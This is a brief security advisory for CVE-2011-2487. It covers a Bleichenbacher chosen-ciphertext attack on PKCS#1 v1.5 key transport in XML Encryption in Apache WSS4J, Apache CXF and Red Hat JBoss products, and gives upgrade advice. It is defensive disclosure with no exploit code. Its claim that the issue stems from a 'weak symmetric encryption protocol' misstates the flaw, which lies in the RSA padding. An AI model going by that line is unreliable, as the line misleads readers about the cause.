CVE-2011-2487

Name of the Vulnerable Software and Affected Versions Apache WSS4J versions prior to 1.6.5 JBossWS (affected versions not specified) Redhat JBoss Business Rules Management System (affected versions not specified) Redhat JBoss Enterprise Application Platform (affected versions not specified) Redhat JBoss Enterprise SOA Platform (affected versions not specified) Redhat JBoss Enterprise Web Platform (affected versions not specified) Redhat JBoss Middleware (affected versions not specified) Redhat JBoss Portal (affected versions not specified) Redhat JBoss Web Services (affected versions not specified) Apache CXF (affected versions not specified)

Description The implementations of PKCS#1 v1.5 key transport mechanism for XMLEncryption in the affected software are susceptible to a Bleichenbacher attack, which is a type of chosen-ciphertext attack. This weakness allows an attacker to recover the symmetric key and conduct further attacks. The issue is related to the use of a weak symmetric encryption protocol.

Recommendations For Apache WSS4J versions prior to 1.6.5, update to version 1.6.5 or later. For JBossWS, Redhat JBoss Business Rules Management System, Redhat JBoss Enterprise Application Platform, Redhat JBoss Enterprise SOA Platform, Redhat JBoss Enterprise Web Platform, Redhat JBoss Middleware, Redhat JBoss Portal, Redhat JBoss Web Services, and Apache CXF, at the moment, there is no information about a newer version that contains a fix for this vulnerability.